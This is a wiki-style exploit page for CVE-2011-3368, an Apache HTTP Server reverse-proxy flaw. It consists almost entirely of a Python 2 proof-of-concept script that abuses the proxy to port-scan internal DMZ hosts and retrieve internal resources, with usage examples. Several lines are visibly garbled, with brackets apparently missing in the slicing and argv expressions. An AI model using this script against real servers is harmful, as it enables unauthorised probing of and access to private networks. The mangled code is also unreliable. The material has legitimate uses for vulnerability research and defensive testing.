Loading
0

CVE-2011-3368 Apache HTTP Server漏洞

PWNWIK.COM

,

POC

#!/usr/bin/env python

import socket
import string
import getopt, sys


known_ports = 0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080

def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):

  get = "GET " + url + "@" + internal_target + ":" + internal_port +  "/" + resource + " HTTP/1.1\r\n"
  get = get + "Host: " + apache_target + "\r\n\r\n"
  
  remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  remoteserver.settimeout(3)

  try:
    remoteserver.connect((apache_target, int(apache_port)))
    remoteserver.send(get)
    return remoteserver.recv(4096)
  except:
    return ""

def get_banner(result):
  return resultstring.find(result, "\r\n\r\n")+4:


def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):

  print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
  for port in tested_ports:
    port = str(port)
    result = send_request(url, apache_target, apache_port, internal_target, port, resource)
    if string.find(result,"HTTP/1.1 200")!=-1 or \
    string.find(result,"HTTP/1.1 30")!=-1 or \
    string.find(result,"HTTP/1.1 502")!=-1:
      print "- Open port: " + port + "/TCP"
      print get_banner(result)
    elif len(result)==0:
       print "- Filtered port: " + port + "/TCP"
    else:
       print "- Closed port: " + port + "/TCP"
      

def usage():
  print
  print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
  print "http://www.secforce.co.uk"
  print
  print "usage():"
  print "python apache_scan.py options"
  print
  print " options"
  print "    -r: Remote Apache host"
  print "    -p: Remote Apache port (default is 80)"
  print "    -u: URL on the remote web server (default is /)"
  print "    -d: Host in the DMZ (default is 127.0.0.1)"
  print "    -e: Port in the DMZ (enables 'single port scan')"
  print "    -g: GET request to the host in the DMZ (default is /)"
  print "    -h: Help page"
  print
  print "examples:"
  print " - Port scan of the remote host"
  print "    python apache_scan.py -r www.example.com -u /images/test.gif"
  print " - Port scan of a host in the DMZ"
  print "    python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
  print " - Retrieve a resource from a host in the DMZ"
  print "    python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
  print

def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
  print
  print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
  print "http://www.secforce.com"
  print
  print " + Target: " + apache_target
  print " + Target port: " + apache_port
  print " + Internal host: " + internal_target
  print " + Tested ports: " + str(tested_ports)
  print " + Internal resource: " + resource
  print


def main():

  global apache_target
  global apache_port
  global url
  global internal_target
  global internal_port
  global resource

  try:
    opts, args = getopt.getopt(sys.argv1:, "u:r:p:d:e:g:h", "help")
  except getopt.GetoptError:
    usage()
    sys.exit(2)

  try:
    for o, a in opts:
      if o in ("-h", "--help"):
        usage()
        sys.exit(2)
      if o == "-u":
        url=a
      if o == "-r":
        apache_target=a
      if o == "-p":
        apache_port=a
      if o == "-d":
        internal_target = a
      if o == "-e":
        internal_port=a
      if o == "-g":
        resource=a        
    
  except getopt.GetoptError:
    usage()
    sys.exit(2)
    
  if apache_target == "":
    usage()
    sys.exit(2)


url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"

main()

if internal_port!="":
  tested_ports = internal_port
else:
  tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)

pwnwiki.com